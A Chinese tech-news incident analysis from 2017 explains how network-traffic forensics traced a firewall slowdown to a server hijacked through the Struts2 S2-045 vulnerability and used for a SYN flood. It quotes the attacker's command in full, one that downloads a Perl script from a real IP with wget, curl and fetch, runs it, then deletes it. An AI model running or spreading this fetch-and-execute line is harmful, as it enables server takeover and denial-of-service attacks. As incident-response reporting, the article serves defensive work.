半导体跨界潮,谁在跟风,谁在下棋?Nikola,一个千亿造车独角兽破产了消息称谷歌将因违反反垄断规则而遭欧盟指控,恐被处以高额罚款透明美学再进化,Nothing Phone(3a)系列手机宣传物料曝光2025 年春运今日迎来最后一天,全国铁路已累计发送旅客 4.99 亿人次国内通信运营商首次:中国联通通过数字货币桥实现跨境支付微软 Outlook“保存邮件到 OneNote”功能 3 月谢幕,“发送到 OneNote”接棒全国首个:浙江率先布局低空经济“下乡”,目标到年底建成 200 个乡村无人机起降枢纽拨打客服电话强制等待 15 分钟,惠普欧洲试点遭强烈反对后取消OPPO一键问屏 / 全能搜基于阶跃星辰Step系列多模态模型打造京东&创维联合定制JD100 Mini电视发布 下单享免费送装一体服务我国成功发射中星 10R 卫星中科闻歌发布“智川”企业智能体平台1.0、“优雅”音视频大模型平台1.5,领先技术加速AI普惠落地这个周末,在最懂开发者的城市邂逅最懂开发者的算力平台DDN推出 Infinia 2.0对象存储 加速AI数据处理速度全部免费!百度文心智能体平台已全面接入DeepSeek模型灯塔云系统:开启劳务派遣管理4.0时代超2671万名消费者申请手机等数码产品购新补贴 用国补买手机上京东皇家马德里对阵赫罗纳:不乏进球与高水平竞技的足球现场OpenAI宣布面向多个国家推出AI代理 Operator
  • 首页 > 网络安全频道 > 攻击防御

    一个真实的利用Struts2最新漏洞的高级攻击全程解析

    2017年03月16日 10:59:42   来源:中国网

      新漏洞的刚被发现发布时,对很多企业网络来说可能是最危险的时刻,应对不及时造成的危害可能是巨大的,特别是像Struts2 S2-045这样的会搞死人的漏洞,显然黑客对他们的关注度比很多企业的安管人员要高的多。这不Struts2 S2-045漏洞没公布几天,我们就发现了成功利用该漏洞对目标主机实现有效控制的高级攻击实例。

      首先说明,我们不是去分析Struts2 S2-045漏洞的,很偶然,某中国500强企业集团公司的互联网出口防火墙CPU利用率持续保持在80%左右,防火墙高负载工作导致服务器网络缓慢。由于该服务器上承载着大量公司核心业务,造成了严重影响。

      幸运的是他们的核心交换机上部署了科来网络回溯分析系统,进行7*24小时全流量监控,并完整记录保存了所有网络通讯数据(其工作模式可以简单理解为部署在大型网络环境中的“行车记录仪”)。技术人员首先想到的是通过该系统分析什么原因导致了防火墙CPU利用率超高,网络缓慢。

      分析发现防火墙高负载与*.35服务器超常规大量发送数据包有关,服务器*.35一天多的时间共产生大量未知TCP应用流量47.48G,其中与意大利IP 62.149.175.81通讯流量达到44.21GB,行为极为可疑。

      回溯分析*.35与意大利IP会话通讯,*.35服务器每秒钟的流量6Mbps左右,大量的TCP会话,每个会话均显示连接被重置,平均包长71字节,综合这些特征,怀疑*.35发动SYN Flood攻击。

      通过数据包分析,确认*.35 向62.149.175.81发送大量SYN,后者快速回复RST的数据包(目标服务器可能已经挂掉),*.35发出的SYN数量极多同时频率极高现象,基本断定*.35发动了SYN Flood攻击。

      这时候结论已经出来了,网络慢的元凶是*.35,它发动了SYN Flood攻击,极高频率地发送了大量的SYN包,建立大量TCP连接,占用防火墙资源,直接影响了正常业务通讯。

      这时候我们的分析还没完,我们想查查*.35中了什么邪,有回溯我们就可以追溯到*.35大量发包前到底发生了什么。这时候追踪到了新鲜出炉的Struts2 S2-045漏洞的新鲜利用,真够快的。

      一个香港IP 223.255.145.158利用Struts2 S2-045漏洞攻击(在Content-type: 中插入非法字符串来远程执行命令并尝试执行该脚本,执行完成后删除),执行的脚本信息为:

      wget -qO - http://65.254.63.20/.jb | perl ;cd /tmp ;curl -O http://65.254.63.20/.jb ;fetch http://65.254.63.20/.jb ;perl .jb ;rm -rf .jb*,即问题服务器向65.254.63.20 get请求.jb文件。

      进一步分析,我们发现问题服务器*.35确实下载获取到.jb文件。真实脚本为per1,可以看到62.149.175.81(SYN Flood目标IP)及端口8080。综合上文分析,基本上可以判定被黑客(所用IP 223.255.145.158)通过Struts2漏洞攻击入侵后,执行命令向美国IP 65.254.63.20请求下载了.jb文件,并执行了per1脚本SYN Flood攻击62.149.175.81.

      结论清楚了,我们发现本次安全事件是黑客通过Struts2的S2-045漏洞,远程向问题服务器执行恶意代码,导致服务器主动下载脚本并成为肉鸡实施SYN Flood攻击,导致互联网访问出现严重性能下降。本人有点小激动,哇哈哈,第一次发现真实的全新的漏洞利用,还是全程回放。

      最后,发表一下此次事件处理的小感受。

      首先是,漏洞是可怕的,要重视,要重视,要重视,赶紧打补丁,不是闹着玩的,别让黑客比你重视,比你现发现,那就完了。

      再有就是,对关键网络系统长期的网络分析,回溯分析太重要了,即使没有公布的漏洞被利用,我们通过对网络异常行为的分析,也能做到全程追溯分析,网络环境越来越复杂,没有可视性的网络是非常危险的。安全态势感知,首先是要可视,通过智能分析发现异常行为,是最基础的感知!能看到的越多就越安全。

      文章内容仅供阅读,不构成投资建议,请谨慎对待。投资者据此操作,风险自担。

    即时

    新闻

    明火炊具市场:三季度健康属性贯穿全类目

    奥维云网(AVC)推总数据显示,2024年1-9月明火炊具线上零售额94.2亿元,同比增加3.1%,其中抖音渠道表现优异,同比有14%的涨幅,传统电商略有下滑,同比降低2.3%。

    企业IT

    重庆创新公积金应用,“区块链+政务服务”显成效

    “以前都要去窗口办,一套流程下来都要半个月了,现在方便多了!”打开“重庆公积金”微信小程序,按照提示流程提交相关材料,仅几秒钟,重庆市民曾某的账户就打进了21600元。

    3C消费

    华硕ProArt创艺27 Pro PA279CRV显示器,高能实力,创

    华硕ProArt创艺27 Pro PA279CRV显示器,凭借其优秀的性能配置和精准的色彩呈现能力,为您的创作工作带来实质性的帮助,双十一期间低至2799元,性价比很高,简直是创作者们的首选。

    研究

    中国信通院罗松:深度解读《工业互联网标识解析体系

    9月14日,2024全球工业互联网大会——工业互联网标识解析专题论坛在沈阳成功举办。